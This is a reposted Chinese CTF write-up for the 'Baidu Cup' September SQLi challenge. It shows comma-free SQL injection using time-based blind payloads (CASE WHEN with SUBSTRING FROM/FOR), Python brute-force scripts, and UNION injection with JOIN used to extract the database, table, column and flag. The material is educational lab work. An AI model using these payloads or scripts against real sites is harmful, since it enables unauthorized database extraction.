美文网首页
"百度杯"CTF比赛 九月场SQLi

"百度杯"CTF比赛 九月场SQLi

作者: 好好睡觉鸭 | 来源:发表于2020-11-10 17:14 被阅读0次

无逗号的注入的注入技巧,提供两种方法

省略前面的脑洞部分

  • 时间盲注

很麻烦,也许以后能用到,先记录下。
由于过滤了逗号,无法使用if,所以使用:

select case when (条件) then 代码1 else 代码 2 end

代替if
payload:

'+AND+(SELECT+CASE+WHEN+(SUBSTRING(database()+FROM+%d+FOR+1)='%s')+THEN+SLEEP(5)+ELSE+0+END)+AND+'1'='1

写脚本跑库名:

import requests

url = 'http://89d69220163a4a98966b84816b4b443c39812cd6b48f4379.changame.ichunqiu.com/l0gin.php?id=1'
mystr = '0987654321qwertyuiopasdfghjklzxcvbnm_{},'
flag = ''

for i in range(32):
    for str in mystr:
        payload = "'+AND+(SELECT+CASE+WHEN+(SUBSTRING(database()+FROM+%d+FOR+1)='%s')+THEN+SLEEP(5)+ELSE+0+END)+AND+'1'='1" % (i+1, str)

        try:
            rul = url + payload
            res = requests.get(rul, timeout=4)
        except requests.exceptions.ReadTimeout, e:
            flag = flag + str
            print "flag:", flag
            break
        except KeyboardInterrupt, e:
            exit(0)
        else:
            pass

得到数据库名为sqli

库名

修改脚本中的payload,继续跑表名,
payload:

'+AND+(SELECT+CASE+WHEN+(SUBSTRING((SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA='sqli')+FROM+1+FOR+1)='a')+THEN+SLEEP(5)+ELSE+0+END)+AND+'1'='1

得到表名为users

表名
继续修改脚本中的payload,跑出列名,
payload: 
'+AND+(SELECT+CASE+WHEN+(SUBSTRING((SELECT+GROUP_CONCAT(COLUMN_NAME)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users')+FROM+1+FOR+1)='a')+THEN+SLEEP(5)+ELSE+0+END)+AND+'1'='1
列名
没有分隔符,- -,应该是flag_9c861b688330
ok,继续跑数据:
最终脚本: 
import requests

url = 'http://2ab6e045ce13446ca9199570a24ba649cd658e4e7372422f.changame.ichunqiu.com/l0gin.php?id=1'
mystr = '0987654321qwertyuiopasdfghjklzxcvbnm_,{}-'
flag = ''

for i in range(64):
    for str in mystr:
        payload = "'+AND+(SELECT+CASE+WHEN+(SUBSTRING((SELECT+GROUP_CONCAT(flag_9c861b688330)+FROM+users)+FROM+%d+FOR+1)='%s')+THEN+SLEEP(5)+ELSE+0+END)+AND+'1'='1" % (i+1, str)

        try:
            rul = url + payload
            res = requests.get(rul, timeout=4)
        except requests.exceptions.ReadTimeout, e:
            flag = flag + str
            print "flag:", flag
            break
        except KeyboardInterrupt, e:
            exit(0)
        else:
            pass

得到flag为:


flag

虽然很麻烦,就当学习了时间盲注的知识吧!

  • 联合查询

使用join代替逗号。
1、order by

  id=1'+order+by+2+%23 正常
  id=1'+order+by+3+%23 错误

2、union select
将id值换成一个无法查询到数据的值,例,id=-1
库名,payload:

id=-1'+union+select+*+from+(select+database())+a+join+(select+2)+b+%23
库名
数据库名为:sqli
表名,payload: 
id=-1%27+union+select+*+from+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=%27sqli%27)+a+join+(select+2)+b+%23
表名
库内表名为:users
列名,payload: 
id=-1%27+union+select+*+from+(select+group_concat(column_name)+from+information_schema.columns+where+table_name=%27users%27)+a+join+(select+2)+b+%23
列名
表内列名:flag_9c861b688330
数据,payload: 
id=-1%27+union+select+*+from+(select+flag_9c861b688330+from+users)+a+join+(select+2)+b+%23
flag

相关文章

网友评论

      本文标题:"百度杯"CTF比赛 九月场SQLi

      本文链接:https://www.haomeiwen.com/subject/rqrjbktx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|"百度杯"CTF比赛 九月场SQLi|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!